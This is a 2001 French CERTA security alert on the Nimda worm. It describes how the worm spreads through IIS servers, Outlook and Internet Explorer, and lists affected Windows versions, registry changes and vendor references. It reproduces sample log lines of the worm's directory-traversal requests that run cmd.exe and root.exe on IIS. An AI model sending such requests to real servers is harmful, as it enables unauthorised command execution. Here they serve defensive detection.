| S . G . D . S . N Agence nationale de la sécurité des systèmes d'information |
![]() |
Paris, le 19 septembre
2001 No CERTA-2001-ALE-013 |
Affaire suivie par :
CERTA
Objet : Propagation du ver/virus NIMDA
(Concept Virus)
| Conditions d'utilisation de ce document : | http://www.certa.ssi.gouv.fr/certa/apropos.html |
| Dernière version de ce document : | http://www.certa.ssi.gouv.fr/site/CERTA-2001-ALE-013 |
Une gestion de version détaillée se trouve à la fin de ce document.
Microsoft Windows 95, 98, ME, NT, et 2000.
Un nouveau ver se propage en exploitant des vulnérabilités connues sous Microsoft Windows.
Le ver NIMDA s'attaque aux serveurs IIS ainsi qu'aux postes
clients utilisant Internet Explorer et/ou Outlook.
Il s'installe sur les serveurs par le biais des vulnérabilités suivantes :
Une fois installé, le ver modifie tous les fichiers
web (HTML et ASP) en y incorporant un script « javascript
» dans le but d'infecter les visiteurs du site
contaminé (Exploitation d'une
vulnérabilité de Windows Média Player,
Réf : CERTA-2001-AVI-041).
Sur les postes clients, le ver se transmet par la messagerie
en expédiant aux destinataires du carnet d'adresses
Outlook un message accompagné d'une pièce jointe
README.EXE ou lors de la consultation d'une page Web
infectée par le code javascript
précédemment cité.
Lors de l'infection, le ver active le partage masqué des disques (exemple : partage de C sous C$).
Ce partage ne devient effectif qu'en cas de redémarrage de la machine infectée.
Exemples de log :
GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt
/system32/cmd.exe?/c+dir
windows.open(''readme.eml'',null,''resizable=no,top=6000,left=6000'')
shell=explorer.exe load.exe -dontrunold
HKEY_CURRENT_USER\Software\Microsoft\Windows\currentVersion\Explorer\advanced
\HideFileExtHKEY_CURRENT_USER\Software\Microsoft\Windows\currentVersion\Explorer\advanced
\HiddenHKEY_CURRENT_USER\Software\Microsoft\Windows\currentVersion\Explorer\advanced
\SuperHidden
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\lanmanserver
\Share\Security
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
http://www.vil.nai.com/vil/virusSummary.asp?virus_k=99209
http://www.f-secure.com/v-descs/nimda.shtml
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
http://download.nai.com/products/mcafee-avert/nimda2.exe
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Bulletin du Cert CC :
http://www.cert.org/body/advisories/CA200126_FA200126.html